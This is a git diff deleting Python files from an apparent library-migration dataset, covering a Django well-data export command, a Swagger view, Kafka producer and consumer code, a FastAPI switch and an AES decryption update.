gwells_zip.write(csv_file) - if os.path.exists(csv_file): - os.remove(csv_file) - - def generate_files(self, zip_filename, spreadsheet_filename): - ####### - # WELL - ####### - well_sql = ("""select well_tag_number, identification_plate_number, - well_identification_plate_attached, - well_status_code, well.well_class_code, - wsc.well_class_code as well_subclass, - intended_water_use_code, licenced_status_code, - observation_well_number, obs_well_status_code, water_supply_system_name, - water_supply_system_well_name, - street_address, city, legal_lot, legal_plan, legal_district_lot, legal_block, - legal_section, legal_township, legal_range, - land_district_code, - legal_pid, - well_location_description, - latitude, longitude, utm_zone_code, utm_northing, utm_easting, - utm_accuracy_code, bcgs_id, - construction_start_date, construction_end_date, alteration_start_date, - alteration_end_date, decommission_start_date, decommission_end_date, - driller_name, consultant_name, consultant_company, - diameter, total_depth_drilled, finished_well_depth, final_casing_stick_up, - bedrock_depth, ground_elevation, ground_elevation_method_code, static_water_level, - well_yield, - well_yield_unit_code, - artesian_flow, artesian_pressure, well_cap_type, well_disinfected, - drilling_method_code, other_drilling_method, well_orientation, - alternative_specs_submitted, - surface_seal_material_code, surface_seal_method_code, surface_seal_length, - backfill_type, - backfill_depth, - liner_material_code, liner_diameter, liner_thickness, surface_seal_thickness, - liner_from, liner_to, - screen_intake_method_code, screen_type_code, screen_material_code, - other_screen_material, - screen_opening_code, screen_bottom_code, other_screen_bottom, development_method_code, - filter_pack_from, - filter_pack_to, filter_pack_material_code, - filter_pack_thickness, - filter_pack_material_size_code, - development_hours, development_notes, - water_quality_colour, water_quality_odour, ems_id, - decommission_reason, decommission_method_code, decommission_details, sealant_material, - backfill_material, - comments, aquifer_id, - drilling_company.drilling_company_code, - ems, - aquifer_id, - registries_person.surname as driller_responsible - from well - left join well_subclass_code as wsc on wsc.well_subclass_guid = well.well_subclass_guid - left join drilling_company on - drilling_company.drilling_company_guid = well.drilling_company_guid - left join registries_person on - registries_person.person_guid = well.driller_responsible_guid - order by well_tag_number""") - ########### - # LITHOLOGY - ########### - lithology_sql = ("""select well_tag_number, lithology_from, lithology_to, lithology_raw_data, - ldc.description as lithology_description_code, - lmc.description as lithology_material_code, - lhc.description as lithology_hardness_code, - lcc.description as lithology_colour_code, - water_bearing_estimated_flow, - well_yield_unit_code, lithology_observation - from lithology_description - left join lithology_description_code as ldc on - ldc.lithology_description_code = lithology_description.lithology_description_code - left join lithology_material_code as lmc on - lmc.lithology_material_code = lithology_description.lithology_material_code - left join lithology_hardness_code as lhc on - lhc.lithology_hardness_code = lithology_description.lithology_hardness_code - left join lithology_colour_code as lcc on - lcc.lithology_colour_code = lithology_description.lithology_colour_code - order by well_tag_number""") - ######## - # CASING - ######## - casing_sql = ("""select well_tag_number, casing_from, casing_to, diameter, casing_code, - casing_material_code, wall_thickness, drive_shoe from casing - order by well_tag_number""") - ######## - # SCREEN - ######## - screen_sql = ("""select well_tag_number, screen_from, screen_to, internal_diameter, - screen_assembly_type_code, slot_size from screen - order by well_tag_number""") - ############ - # PRODUCTION - ############ - production_sql = ("""select well_tag_number, yield_estimation_method_code, well_yield_unit_code, - yield_estimation_rate, - yield_estimation_duration, static_level, drawdown, - hydro_fracturing_performed, hydro_fracturing_yield_increase from production_data - order by well_tag_number""") - ############## - # PERFORATIONS - ############## - perforation_sql = ("""select well_tag_number, liner_from, liner_to, liner_diameter, - liner_perforation_from, liner_perforation_to, liner_thickness - from - perforation - order by well_tag_number""") - - if os.path.exists(zip_filename): - os.remove(zip_filename) - with zipfile.ZipFile(zip_filename, 'w') as gwells_zip: - if os.path.exists(spreadsheet_filename): - os.remove(spreadsheet_filename) - workbook = Workbook(write_only=True) - # Well - with connection.cursor() as cursor: - cursor.execute(well_sql) - self.export(workbook, gwells_zip, 'well', cursor) - # Lithology - with connection.cursor() as cursor: - cursor.execute(lithology_sql) - self.export(workbook, gwells_zip, 'lithology', cursor) - # Casing - with connection.cursor() as cursor: - cursor.execute(casing_sql) - self.export(workbook, gwells_zip, 'casing', cursor) - # Screen - with connection.cursor() as cursor: - cursor.execute(screen_sql) - self.export(workbook, gwells_zip, 'screen', cursor) - # Production - with connection.cursor() as cursor: - cursor.execute(production_sql) - self.export(workbook, gwells_zip, 'production', cursor) - # Perforation - with connection.cursor() as cursor: - cursor.execute(perforation_sql) - self.export(workbook, gwells_zip, 'perforation', cursor) - workbook.save(filename=spreadsheet_filename) diff --git a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.target.py b/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.target.py deleted file mode 100644 index 7625c5a..0000000 --- a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.target.py +++ /dev/null @@ -1,231 +0,0 @@ -import csv -import zipfile -import os -import logging -import string - -from django.core.management.base import BaseCommand -from django.db import models -from django.db import connection - -from minio import Minio -from xlsxwriter import Workbook - -from gwells.settings.base import get_env_variable - -# Run from command line : -# python manage.py export - -logger = logging.getLogger(__name__) - - -class Command(BaseCommand): - - def handle(self, *args, **options): - logger.info('starting export') - zip_filename = 'gwells.zip' - spreadsheet_filename = 'gwells.xlsx' - self.generate_files(zip_filename, spreadsheet_filename) - self.upload_files(zip_filename, spreadsheet_filename) - logger.info('cleaning up') - for filename in (zip_filename, spreadsheet_filename): - if os.path.exists(filename): - os.remove(filename) - logger.info('export complete') - - def upload_files(self, zip_filename, spreadsheet_filename): - minioClient = Minio(get_env_variable('S3_HOST'), - access_key=get_env_variable('S3_PUBLIC_ACCESS_KEY'), - secret_key=get_env_variable('S3_PUBLIC_SECRET_KEY'), - secure=True) - for filename in (zip_filename, spreadsheet_filename): - logger.info('uploading {}'.format(filename)) - with open(filename, 'rb') as file_data: - file_stat = os.stat(filename) - # Do we need to remove the existing files 1st? - minioClient.put_object(get_env_variable('S3_WELL_EXPORT_BUCKET'), - filename, - file_data, - file_stat.st_size) - - def export(self, workbook, gwells_zip, worksheet_name, cursor): - logger.info('exporting {}'.format(worksheet_name)) - worksheet = workbook.add_worksheet(worksheet_name) - csv_file = '{}.csv'.format(worksheet_name) - if os.path.exists(csv_file): - os.remove(csv_file) - with open(csv_file, 'w') as csvfile: - csvwriter = csv.writer(csvfile, dialect='excel') - - values = [] - # Write the headings - for index, field in enumerate(cursor.description): - worksheet.write(0, index, '{}'.format(field.name)) - values.append(field.name) - csvwriter.writerow(values) - - # Write the values - row_index = 0 - for row, record in enumerate(cursor.fetchall()): - values = [] - num_values = 0 - for col, value in enumerate(record): - if not (value == "" or value is None): - num_values += 1 - if type(value) is str: - # There are lots of non-printable characters in the source data that can cause - # issues in the export, so we have to clear them out. - v = ''.join([s for s in value if s in string.printable]) - # We can't have something starting with an = sign, - # it would be interpreted as a formula in excel. - if v.startswith('='): - v = '\'{}'.format(v) - values.append(v) - else: - values.append(value) - if num_values > 1: - # We always have a well_tag_number, but if that's all we have, then just skip this record - row_index += 1 - for col, value in enumerate(values): - if value: - worksheet.write(row_index, col, value) - csvwriter.writerow(values) - gwells_zip.write(csv_file) - if os.path.exists(csv_file): - os.remove(csv_file) - - def generate_files(self, zip_filename, spreadsheet_filename): - ####### - # WELL - ####### - well_sql = ("""select well_tag_number, identification_plate_number, - well_identification_plate_attached, - well_status_code, well.well_class_code, - wsc.well_class_code as well_subclass, - intended_water_use_code, licenced_status_code, - observation_well_number, obs_well_status_code, water_supply_system_name, - water_supply_system_well_name, - street_address, city, legal_lot, legal_plan, legal_district_lot, legal_block, - legal_section, legal_township, legal_range, - land_district_code, - legal_pid, - well_location_description, - latitude, longitude, utm_zone_code, utm_northing, utm_easting, - utm_accuracy_code, bcgs_id, - construction_start_date, construction_end_date, alteration_start_date, - alteration_end_date, decommission_start_date, decommission_end_date, - driller_name, consultant_name, consultant_company, - diameter, total_depth_drilled, finished_well_depth, final_casing_stick_up, - bedrock_depth, ground_elevation, ground_elevation_method_code, static_water_level, - well_yield, - well_yield_unit_code, - artesian_flow, artesian_pressure, well_cap_type, well_disinfected, - drilling_method_code, other_drilling_method, well_orientation, - alternative_specs_submitted, - surface_seal_material_code, surface_seal_method_code, surface_seal_length, - backfill_type, - backfill_depth, - liner_material_code, liner_diameter, liner_thickness, surface_seal_thickness, - liner_from, liner_to, - screen_intake_method_code, screen_type_code, screen_material_code, - other_screen_material, - screen_opening_code, screen_bottom_code, other_screen_bottom, development_method_code, - filter_pack_from, - filter_pack_to, filter_pack_material_code, - filter_pack_thickness, - filter_pack_material_size_code, - development_hours, development_notes, - water_quality_colour, water_quality_odour, ems_id, - decommission_reason, decommission_method_code, decommission_details, sealant_material, - backfill_material, - comments, aquifer_id, - drilling_company.drilling_company_code, - ems, - aquifer_id, - registries_person.surname as driller_responsible - from well - left join well_subclass_code as wsc on wsc.well_subclass_guid = well.well_subclass_guid - left join drilling_company on - drilling_company.drilling_company_guid = well.drilling_company_guid - left join registries_person on - registries_person.person_guid = well.driller_responsible_guid - order by well_tag_number""") - ########### - # LITHOLOGY - ########### - lithology_sql = ("""select well_tag_number, lithology_from, lithology_to, lithology_raw_data, - ldc.description as lithology_description_code, - lmc.description as lithology_material_code, - lhc.description as lithology_hardness_code, - lcc.description as lithology_colour_code, - water_bearing_estimated_flow, - well_yield_unit_code, lithology_observation - from lithology_description - left join lithology_description_code as ldc on - ldc.lithology_description_code = lithology_description.lithology_description_code - left join lithology_material_code as lmc on - lmc.lithology_material_code = lithology_description.lithology_material_code - left join lithology_hardness_code as lhc on - lhc.lithology_hardness_code = lithology_description.lithology_hardness_code - left join lithology_colour_code as lcc on - lcc.lithology_colour_code = lithology_description.lithology_colour_code - order by well_tag_number""") - ######## - # CASING - ######## - casing_sql = ("""select well_tag_number, casing_from, casing_to, diameter, casing_code, - casing_material_code, wall_thickness, drive_shoe from casing - order by well_tag_number""") - ######## - # SCREEN - ######## - screen_sql = ("""select well_tag_number, screen_from, screen_to, internal_diameter, - screen_assembly_type_code, slot_size from screen - order by well_tag_number""") - ############ - # PRODUCTION - ############ - production_sql = ("""select well_tag_number, yield_estimation_method_code, well_yield_unit_code, - yield_estimation_rate, - yield_estimation_duration, static_level, drawdown, - hydro_fracturing_performed, hydro_fracturing_yield_increase from production_data - order by well_tag_number""") - ############## - # PERFORATIONS - ############## - perforation_sql = ("""select well_tag_number, liner_from, liner_to, liner_diameter, - liner_perforation_from, liner_perforation_to, liner_thickness - from - perforation - order by well_tag_number""") - - if os.path.exists(zip_filename): - os.remove(zip_filename) - with zipfile.ZipFile(zip_filename, 'w') as gwells_zip: - if os.path.exists(spreadsheet_filename): - os.remove(spreadsheet_filename) - with Workbook(spreadsheet_filename) as workbook: - # Well - with connection.cursor() as cursor: - cursor.execute(well_sql) - self.export(workbook, gwells_zip, 'well', cursor) - # Lithology - with connection.cursor() as cursor: - cursor.execute(lithology_sql) - self.export(workbook, gwells_zip, 'lithology', cursor) - # Casing - with connection.cursor() as cursor: - cursor.execute(casing_sql) - self.export(workbook, gwells_zip, 'casing', cursor) - # Screen - with connection.cursor() as cursor: - cursor.execute(screen_sql) - self.export(workbook, gwells_zip, 'screen', cursor) - # Production - with connection.cursor() as cursor: - cursor.execute(production_sql) - self.export(workbook, gwells_zip, 'production', cursor) - # Perforation - with connection.cursor() as cursor: - cursor.execute(perforation_sql) - self.export(workbook, gwells_zip, 'perforation', cursor) diff --git a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.diff b/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.diff deleted file mode 100644 index 86d8018..0000000 --- a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.diff +++ /dev/null @@ -1,15 +0,0 @@ -diff --git a/tob-api/api_v2/swagger.py b/tob-api/api_v2/swagger.py - index a3f37eac4a652844bc47e834970854349f1d4399..728f86e941dfb6bdbee27628d28425757af5f22d 100644 - --- a/tob-api/api_v2/swagger.py - +++ b/tob-api/api_v2/swagger.py -@@ -3,7 +3,9 @@ from rest_framework import permissions - from rest_framework.response import Response - from rest_framework.schemas import SchemaGenerator - from rest_framework.views import APIView --from rest_framework_swagger import renderers -+ -+from drf_yasg.views import get_schema_view -+from drf_yasg import openapi - - LOGGER = logging.getLogger(__name__) - diff --git a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.source.py b/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.source.py deleted file mode 100644 index 1aeca9c..0000000 --- a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.source.py +++ /dev/null @@ -1,33 +0,0 @@ -import logging -from rest_framework import permissions -from rest_framework.response import Response -from rest_framework.schemas import SchemaGenerator -from rest_framework.views import APIView -from rest_framework_swagger import renderers - -LOGGER = logging.getLogger(__name__) - - -class SwaggerSchemaView(APIView): - """ - Utility class for rendering swagger documentation - """ - permission_classes = (permissions.AllowAny,) - renderer_classes = [renderers.OpenAPIRenderer, renderers.SwaggerUIRenderer] - schema = None - - def get(self, request): - params = { - "urlconf": "api_v2.urls", - } - if "HTTP_X_FORWARDED_HOST" in request.META: - # forwarding via tob-web - #params["url"] = "{}://{}/api/".format( - # request.META.get("HTTP_X_FORWARDED_PROTO", "http"), - # request.META["HTTP_X_FORWARDED_HOST"]) - params["url"] = "/api/" - else: - params["url"] = "/api/v2/" - generator = SchemaGenerator(**params) - schema = generator.get_schema(request=request) - return Response(schema) diff --git a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.target.py b/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.target.py deleted file mode 100644 index 2dbbdcf..0000000 --- a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.target.py +++ /dev/null @@ -1,35 +0,0 @@ -import logging -from rest_framework import permissions -from rest_framework.response import Response -from rest_framework.schemas import SchemaGenerator -from rest_framework.views import APIView - -from drf_yasg.views import get_schema_view -from drf_yasg import openapi - -LOGGER = logging.getLogger(__name__) - - -class SwaggerSchemaView(APIView): - """ - Utility class for rendering swagger documentation - """ - permission_classes = (permissions.AllowAny,) - renderer_classes = [renderers.OpenAPIRenderer, renderers.SwaggerUIRenderer] - schema = None - - def get(self, request): - params = { - "urlconf": "api_v2.urls", - } - if "HTTP_X_FORWARDED_HOST" in request.META: - # forwarding via tob-web - #params["url"] = "{}://{}/api/".format( - # request.META.get("HTTP_X_FORWARDED_PROTO", "http"), - # request.META["HTTP_X_FORWARDED_HOST"]) - params["url"] = "/api/" - else: - params["url"] = "/api/v2/" - generator = SchemaGenerator(**params) - schema = generator.get_schema(request=request) - return Response(schema) diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.diff b/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.diff deleted file mode 100644 index bd70d39..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.diff +++ /dev/null @@ -1,79 +0,0 @@ -diff --git a/agent/dnsagent/clis/start.py b/agent/dnsagent/clis/start.py - index 69dba880876b66b98de7538b33304fb4ff5d8aef..6b10345398630fbb418f84ca7268d481ecad56ee 100644 - --- a/agent/dnsagent/clis/start.py - +++ b/agent/dnsagent/clis/start.py -@@ -1,8 +1,10 @@ - import os - import logging -+import json -+ -+from confluent_kafka import Consumer, KafkaException - - from dnsagent.clis.base import Base --from dnsagent.libs import kafka as kafka_lib - from dnsagent.libs import knot as knot_lib - - -@@ -20,30 +22,27 @@ class Start(Base): - -h --help Print usage - """ - -- def connect_kafka(self): -- broker_host = os.environ.get("RESTKNOT_KAFKA_BROKER") -- broker_port = os.environ.get("RESTKNOT_KAFKA_PORTS") -- broker = f"{broker_host}:{broker_port}" -+ def consume(self): -+ brokers = os.environ.get("RESTKNOT_KAFKA_BROKERS") - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") -+ agent_type = os.environ.get("RESTKNOT_AGENT_TYPE") - -- if (broker_host and broker_port) is None: -- logger.info("Can't find kafka host and port") -- exit() -+ conf = { -+ "bootstrap.servers": brokers, -+ "auto.offset.reset": "earliest", -+ "enable.auto.commit": True, -+ } -+ consumer = Consumer(conf) -+ consumer.suscribe(topic) - - try: -- logger.info("Connecting to broker : " + broker) -- consumer = kafka_lib.get_kafka_consumer(broker, topic) -- return consumer -- except Exception as e: -- logger.info(f"Can't Connect to broker: {e}") -- exit() -- -- def take_message(self, consumer): -- agent_type = os.environ.get("RESTKNOT_AGENT_TYPE") -+ while True: -+ message = consumer.poll(timeout=1.0) -+ if message.error(): -+ raise KafkaException(message.error()) - -- try: -- for message in consumer: -- message = message.value -+ message = message.value() -+ message = json.loads(message.decode("utf-8")) - - agent_type_msg = message["agent"]["agent_type"] - if agent_type in agent_type_msg: -@@ -52,11 +51,11 @@ class Start(Base): - for query in knot_queries: - knot_lib.execute(query) - -- consumer.close() -- - except KeyboardInterrupt: - print("Stopping dnsagent. Press Ctrl+C again to exit") -+ finally: -+ # Close down consumer to commit final offsets. -+ consumer.close() - - def execute(self): -- consumer = self.connect_kafka() -- self.take_message(consumer) -+ self.consume() diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.source.py b/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.source.py deleted file mode 100644 index 1416e66..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.source.py +++ /dev/null @@ -1,62 +0,0 @@ -import os -import logging - -from dnsagent.clis.base import Base -from dnsagent.libs import kafka as kafka_lib -from dnsagent.libs import knot as knot_lib - - -logger = logging.getLogger(__name__) - - -class Start(Base): - """ - usage: - start - - Command : - - Options: - -h --help Print usage - """ - - def connect_kafka(self): - broker_host = os.environ.get("RESTKNOT_KAFKA_BROKER") - broker_port = os.environ.get("RESTKNOT_KAFKA_PORTS") - broker = f"{broker_host}:{broker_port}" - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") - - if (broker_host and broker_port) is None: - logger.info("Can't find kafka host and port") - exit() - - try: - logger.info("Connecting to broker : " + broker) - consumer = kafka_lib.get_kafka_consumer(broker, topic) - return consumer - except Exception as e: - logger.info(f"Can't Connect to broker: {e}") - exit() - - def take_message(self, consumer): - agent_type = os.environ.get("RESTKNOT_AGENT_TYPE") - - try: - for message in consumer: - message = message.value - - agent_type_msg = message["agent"]["agent_type"] - if agent_type in agent_type_msg: - - knot_queries = message["knot"] - for query in knot_queries: - knot_lib.execute(query) - - consumer.close() - - except KeyboardInterrupt: - print("Stopping dnsagent. Press Ctrl+C again to exit") - - def execute(self): - consumer = self.connect_kafka() - self.take_message(consumer) diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.target.py b/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.target.py deleted file mode 100644 index b43ab65..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.target.py +++ /dev/null @@ -1,61 +0,0 @@ -import os -import logging -import json - -from confluent_kafka import Consumer, KafkaException - -from dnsagent.clis.base import Base -from dnsagent.libs import knot as knot_lib - - -logger = logging.getLogger(__name__) - - -class Start(Base): - """ - usage: - start - - Command : - - Options: - -h --help Print usage - """ - - def consume(self): - brokers = os.environ.get("RESTKNOT_KAFKA_BROKERS") - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") - agent_type = os.environ.get("RESTKNOT_AGENT_TYPE") - - conf = { - "bootstrap.servers": brokers, - "auto.offset.reset": "earliest", - "enable.auto.commit": True, - } - consumer = Consumer(conf) - consumer.suscribe(topic) - - try: - while True: - message = consumer.poll(timeout=1.0) - if message.error(): - raise KafkaException(message.error()) - - message = message.value() - message = json.loads(message.decode("utf-8")) - - agent_type_msg = message["agent"]["agent_type"] - if agent_type in agent_type_msg: - - knot_queries = message["knot"] - for query in knot_queries: - knot_lib.execute(query) - - except KeyboardInterrupt: - print("Stopping dnsagent. Press Ctrl+C again to exit") - finally: - # Close down consumer to commit final offsets. - consumer.close() - - def execute(self): - self.consume() diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.diff b/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.diff deleted file mode 100644 index 1e68ac3..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.diff +++ /dev/null @@ -1,53 +0,0 @@ -diff --git a/api/app/helpers/producer.py b/api/app/helpers/producer.py - index 69dba880876b66b98de7538b33304fb4ff5d8aef..6b10345398630fbb418f84ca7268d481ecad56ee 100644 - --- a/api/app/helpers/producer.py - +++ b/api/app/helpers/producer.py -@@ -2,7 +2,7 @@ import json - import os - - from flask import current_app --from kafka import KafkaProducer -+from confluent_kafka import Producer - - from app.helpers import helpers - -@@ -15,24 +15,30 @@ def kafka_producer(): - except KeyError: - raise ValueError("Can't find brokers list in config") - -- producer = KafkaProducer( -- bootstrap_servers=brokers, -- value_serializer=lambda m: json.dumps(m).encode("utf-8"), -- ) -+ brokers = ",".join(brokers) -+ conf = {"bootstrap.servers": brokers} -+ producer = Producer(**conf) - return producer - - -+def _delivery_report(err, msg): -+ if err is not None: -+ raise ValueError(f"Message delivery failed: {err}") -+ -+ - def send(message): - """Send given message to Kafka broker.""" - producer = None - try: - producer = kafka_producer() - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") -- producer.send(topic, message) -- producer.flush() -+ encoded_message = json.dumps(message).encode("utf-8") -+ producer.produce(topic, encoded_message, callback=_delivery_report) - except Exception as e: - current_app.logger.error(f"{e}") - raise ValueError(f"{e}") -- finally: -- if producer: -- producer.close() -+ -+ # Serve delivery callback queue. -+ producer.poll(0) -+ # Wait until all messages have been delivered -+ producer.flush() diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.source.py b/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.source.py deleted file mode 100644 index 17562f7..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.source.py +++ /dev/null @@ -1,38 +0,0 @@ -import json -import os - -from flask import current_app -from kafka import KafkaProducer - -from app.helpers import helpers - - -def kafka_producer(): - """Create Kafka producer.""" - config = helpers.get_config() - try: - brokers = config["brokers"] - except KeyError: - raise ValueError("Can't find brokers list in config") - - producer = KafkaProducer( - bootstrap_servers=brokers, - value_serializer=lambda m: json.dumps(m).encode("utf-8"), - ) - return producer - - -def send(message): - """Send given message to Kafka broker.""" - producer = None - try: - producer = kafka_producer() - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") - producer.send(topic, message) - producer.flush() - except Exception as e: - current_app.logger.error(f"{e}") - raise ValueError(f"{e}") - finally: - if producer: - producer.close() diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.target.py b/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.target.py deleted file mode 100644 index 04dd011..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.target.py +++ /dev/null @@ -1,44 +0,0 @@ -import json -import os - -from flask import current_app -from confluent_kafka import Producer - -from app.helpers import helpers - - -def kafka_producer(): - """Create Kafka producer.""" - config = helpers.get_config() - try: - brokers = config["brokers"] - except KeyError: - raise ValueError("Can't find brokers list in config") - - brokers = ",".join(brokers) - conf = {"bootstrap.servers": brokers} - producer = Producer(**conf) - return producer - - -def _delivery_report(err, msg): - if err is not None: - raise ValueError(f"Message delivery failed: {err}") - - -def send(message): - """Send given message to Kafka broker.""" - producer = None - try: - producer = kafka_producer() - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") - encoded_message = json.dumps(message).encode("utf-8") - producer.produce(topic, encoded_message, callback=_delivery_report) - except Exception as e: - current_app.logger.error(f"{e}") - raise ValueError(f"{e}") - - # Serve delivery callback queue. - producer.poll(0) - # Wait until all messages have been delivered - producer.flush() diff --git a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.diff b/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.diff deleted file mode 100644 index afaf8f0..0000000 --- a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.diff +++ /dev/null @@ -1,15 +0,0 @@ -diff --git a/python/verb_conjugate_fr/__init__.py b/python/verb_conjugate_fr/__init__.py - index 85a5ef1f0d74fae1db084114a914f1df6f646480..24a848d285ae2c6f3e5b06d1a8ee718cb3f17133 100644 - --- a/python/verb_conjugate_fr/__init__.py - +++ b/python/verb_conjugate_fr/__init__.py -@@ -1,8 +1,5 @@ - #!/usr/bin/env python --from flask import Flask --from flask_restful import Api -- --app = Flask(__name__) --api = Api(app) -+from fastapi import FastAPI -+app = FastAPI(title="verb-conjugate-fr") - - import verb_conjugate_fr.views diff --git a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.source.py b/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.source.py deleted file mode 100644 index 0551464..0000000 --- a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.source.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python -from flask import Flask -from flask_restful import Api - -app = Flask(__name__) -api = Api(app) - -import verb_conjugate_fr.views diff --git a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.target.py b/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.target.py deleted file mode 100644 index b1960ca..0000000 --- a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.target.py +++ /dev/null @@ -1,5 +0,0 @@ -#!/usr/bin/env python -from fastapi import FastAPI -app = FastAPI(title="verb-conjugate-fr") - -import verb_conjugate_fr.views diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.diff b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.diff deleted file mode 100644 index 74142e3..0000000 --- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.diff +++ /dev/null @@ -1,19 +0,0 @@ -diff --git a/geoportal/c2cgeoportal_geoportal/__init__.py b/geoportal/c2cgeoportal_geoportal/__init__.py - index 290aac93ed6e3874bb3789b0f5a0852b68cc47fe..14388c3d85ab164d7b36b1331534913a1c9d6c9a 100644 - --- a/geoportal/c2cgeoportal_geoportal/__init__.py - +++ b/geoportal/c2cgeoportal_geoportal/__init__.py -@@ -319,8 +319,12 @@ def create_get_user_from_request(settings): - if aeskey is None: # pragma: nocover - raise Exception("urllogin is not configured") - now = int(time.time()) -- cipher = AES.new(aeskey) -- auth = json.loads(cipher.decrypt(binascii.unhexlify(auth_enc))) -+ data = binascii.unhexlify(auth_enc.encode('ascii')) -+ nonce = data[0:16] -+ tag = data[16:32] -+ ciphertext = data[32:] -+ cipher = AES.new(aeskey.encode("ascii"), AES.MODE_EAX, nonce) -+ auth = json.loads(cipher.decrypt_and_verify(ciphertext, tag).decode("utf-8")) - - if "t" in auth and "u" in auth and "p" in auth: - timestamp = int(auth["t"]) diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.source.py b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.source.py deleted file mode 100644 index 7092b6a..0000000 --- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.source.py +++ /dev/null @@ -1,765 +0,0 @@ -# -*- coding: utf-8 -*- - -# Copyright (c) 2011-2018, Camptocamp SA -# All rights reserved. - -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: - -# 1. Redistributions of source code must retain the above copyright notice, this -# list of conditions and the following disclaimer. -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. - -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR -# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -# The views and conclusions contained in the software and documentation are those -# of the authors and should not be interpreted as representing official policies, -# either expressed or implied, of the FreeBSD Project. - -import time -import logging -import mimetypes -import binascii -from urllib.parse import urlsplit - -import c2cwsgiutils -import re -import simplejson as json -from socket import gethostbyname, gaierror -from ipcalc import IP, Network -from Crypto.Cipher import AES -import importlib - -import zope.event.classhandler -from pyramid.config import Configurator -from 